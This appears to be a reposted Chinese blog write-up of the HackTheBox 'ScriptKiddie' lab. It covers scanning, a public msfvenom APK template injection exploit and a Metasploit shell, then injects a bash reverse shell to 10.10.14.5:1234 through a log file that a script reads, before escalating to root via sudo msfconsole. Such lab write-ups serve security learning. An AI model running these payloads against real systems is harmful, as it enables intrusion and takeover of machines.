HackTheBox-------ScriptKiddie
本文共 918 字,大约阅读时间需要 3 分钟。
文章目录
题记
- 记录一次依葫芦画瓢的渗透测试
- 第一次做渗透测试 有点兴奋~
信息收集
- namp 扫描ip地址 发现开放的端口
- 访问一下端口
漏洞寻找
- 网页是一个在线的nmap工具(好像看过类似的CTF题目…)
- 输入一个ip地址试试
- 是Nmap的7.80版本
- 利用Exploit Database未发现有已知道的漏洞
- 还有一个venom工具
- 利用Exploit Database发现存在APK模板注入 网上给了漏洞的利用 可以直接拿
- 在利用exp生成apk文件的时候 需要安装
sudo apt-get install openjdk-11-jdk-headless - 执行成功会生成evil.apk文件
- 接着监听5000端口
- 上传evil.apk文件
- 监听成功
漏洞利用
- 获取用户的shell 这里我用了msf
- 接着去提升一下权限
python3 -c 'import pty;pty.spawn("/bin/bash")' - 获得了kid的权限
- 在获取kid权限后 发现了pwn用户 尝试获取其权限
- 并且返校了一个sh脚本
#!/bin/bashlog=/home/kid/logs/hackerscd /home/pwn/cat $log | cut -d' ' -f3- | sort -u | while read ip; do sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &doneif [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi - 语句为真时执行nmap的扫描语句,否则将信息写入hackers文件
- 接着我们利用这个去获取pwn的权限
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/1234 0>&1' #" >> hackers
sudo -l发现可以利用msf去访root文件
sudo msfconsole/bin/bashcd /cd /root- 发现已经获取root权限了 okkk!!!
转载地址:http://wbwmf.baihongyu.com/
你可能感兴趣的文章
目的:使用CUDA环境变量CUDA_VISIBLE_DEVICES来限定CUDA程序所能使用的GPU设备
查看>>
问题:Mysql中字段类型为text的值, java使用selectByExample查询为null
查看>>
程序员--学习之路--技巧
查看>>
解决问题之 MySQL慢查询日志设置
查看>>
contOS6 部署 lnmp、FTP、composer、ThinkPHP5、docker详细步骤
查看>>
TP5.1模板布局中遇到的坑,配置完不生效解决办法
查看>>
PHPstudy中遇到的坑No input file specified,以及传到linux环境下遇到的坑,模板文件不存在
查看>>
TP5.1事务操作和TP5事务回滚操作多表
查看>>
composer install或composer update 或 composer require phpoffice/phpexcel 失败解决办法
查看>>
TP5.1项目从windows的Apache服务迁移到linux的Nginx服务需要注意几点。
查看>>
win10安装软件 打开时报错 找不到 msvcp120.dll
查看>>
PHPunit+Xdebug代码覆盖率以及遇到的问题汇总
查看>>
PHPUnit安装及使用
查看>>
PHP项目用xhprof性能分析(安装及应用实例)
查看>>
composer安装YII
查看>>
Sublime text3快捷键演示
查看>>
sublime text3 快捷键修改
查看>>
计算机底层是什么东西?
查看>>
关于PHP几点建议
查看>>
硬盘的接口、协议
查看>>